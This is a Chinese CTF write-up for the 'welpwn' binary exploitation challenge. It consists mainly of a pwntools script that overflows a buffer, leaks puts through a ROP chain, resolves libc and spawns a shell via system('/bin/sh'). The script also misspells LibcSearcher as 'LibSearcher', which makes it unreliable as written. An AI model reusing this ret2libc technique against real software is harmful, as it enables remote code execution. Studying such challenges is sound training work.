pwn-welpwn

1.题目

1.保护机制

开启nx

2.关键代码

主函数
pwn-welpwn
echo函数
pwn-welpwn

2.思路

重点1:可以看到栈溢出漏洞,但是echo函数代码显然限制了ROP链中有\x00的出现,但是我们发现echo函数栈非常小,导出我们溢出可以溢出到主函数的buf缓冲区中,而且主函数的buf是不受\x00影响的,所以我们先使用pop覆盖echo函数的返回值,然后在主函数的buf中执行shellcode
重点2:这次试用了LibcSearcher库来完成函数地址泄漏

from pwn import *
from ctypes import *
from LibcSearcher import *

context(arch="amd64",os="linux",log_level="debug")
#con = remote('111.200.241.244',59105)
con = process('./pwn')
elf = ELF('./pwn')

pop_rdi = 0x4008a3
puts_plt = elf.plt['puts']
pop4 = 0x40089c
puts_got = elf.got['puts']
start_addr = 0x400630

payload = "A"*24 + p64(pop4) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(start_addr)
con.recvuntil("RCTF\n")
con.send(payload)
con.recvuntil("\x40")
puts_addr = u64(con.recv(6).ljust(8,'\x00'))

libc = LibSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

con.recvuntil('RCTF\n')
payload = "A"*24 + p64(pop4) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
con.send(payload)
con.interactive()
上一篇:p64 构造器详解


下一篇:长城杯2021 pwn